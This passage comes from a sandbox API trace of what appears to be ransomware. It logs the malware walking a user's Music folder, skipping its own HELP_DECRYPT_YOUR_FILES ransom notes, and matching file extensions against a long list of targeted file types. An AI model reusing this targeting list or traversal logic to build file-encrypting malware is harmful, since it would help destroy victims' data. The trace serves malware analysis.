dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0190.445] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891367b7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x891367b7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8915c7e1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0190.445] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2="..") returned 1
	[0190.445] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2=".") returned 1
	[0190.446] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\"
	[0190.446] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\", lpString2="HELP_DECRYPT_YOUR_FILES.HTML" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\HELP_DECRYPT_YOUR_FILES.HTML") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\HELP_DECRYPT_YOUR_FILES.HTML"
	[0190.446] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\HELP_DECRYPT_YOUR_FILES.HTML") returned 56
	[0190.446] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.446] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\HELP_DECRYPT_YOUR_FILES.HTML", cchLength=0x38 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\help_decrypt_your_files.html") returned 0x38
	[0190.446] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.446] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\help_decrypt_your_files.html", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.html"
	[0190.446] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x891367b7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x891367b7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x891367b7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0190.446] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2="..") returned 1
	[0190.447] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2=".") returned 1
	[0190.447] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\"
	[0190.447] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\", lpString2="HELP_DECRYPT_YOUR_FILES.TXT" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\HELP_DECRYPT_YOUR_FILES.TXT") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\HELP_DECRYPT_YOUR_FILES.TXT"
	[0190.447] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\HELP_DECRYPT_YOUR_FILES.TXT") returned 55
	[0190.447] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.447] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\HELP_DECRYPT_YOUR_FILES.TXT", cchLength=0x37 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\help_decrypt_your_files.txt") returned 0x37
	[0190.447] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.447] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\help_decrypt_your_files.txt", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.txt"
	[0190.447] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0520b0, ftCreationTime.dwHighDateTime=0x1d9706a, ftLastAccessTime.dwLowDateTime=0x98e688a0, ftLastAccessTime.dwHighDateTime=0x1d97449, ftLastWriteTime.dwLowDateTime=0x98e688a0, ftLastWriteTime.dwHighDateTime=0x1d97449, nFileSizeHigh=0x0, nFileSizeLow=0x3109, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HJ3Asnb2Vn9Lht8ucZ.m4a", cAlternateFileName="HJ3ASN~1.M4A")) returned 1
	[0190.447] lstrcmpW (lpString1="HJ3Asnb2Vn9Lht8ucZ.m4a", lpString2="..") returned 1
	[0190.448] lstrcmpW (lpString1="HJ3Asnb2Vn9Lht8ucZ.m4a", lpString2=".") returned 1
	[0190.448] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Music\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\"
	[0190.448] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\", lpString2="HJ3Asnb2Vn9Lht8ucZ.m4a" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Music\\HJ3Asnb2Vn9Lht8ucZ.m4a") returned="C:\\Users\\RDhJ0CNFevzX\\Music\\HJ3Asnb2Vn9Lht8ucZ.m4a"
	[0190.448] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Music\\HJ3Asnb2Vn9Lht8ucZ.m4a") returned 50
	[0190.448] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0190.448] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Music\\HJ3Asnb2Vn9Lht8ucZ.m4a", cchLength=0x32 | out: lpsz="c:\\users\\rdhj0cnfevzx\\music\\hj3asnb2vn9lht8ucz.m4a") returned 0x32
	[0190.448] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.448] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\music\\hj3asnb2vn9lht8ucz.m4a", lpSrch="help_decrypt_your_files") returned 0x0
	[0190.448] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\music\\hj3asnb2vn9lht8ucz.m4a" | out: lpString1="c:\\users\\rdhj0cnfevzx\\music\\hj3asnb2vn9lht8ucz.m4a") returned="c:\\users\\rdhj0cnfevzx\\music\\hj3asnb2vn9lht8ucz.m4a"
	[0190.449] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\music\\hj3asnb2vn9lht8ucz.m4a") returned 50
	[0190.449] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0190.449] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.449] StrStrW (lpFirst=".m4a", lpSrch=".") returned=".m4a"
	[0190.449] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0190.449] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".m4a") returned=".m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.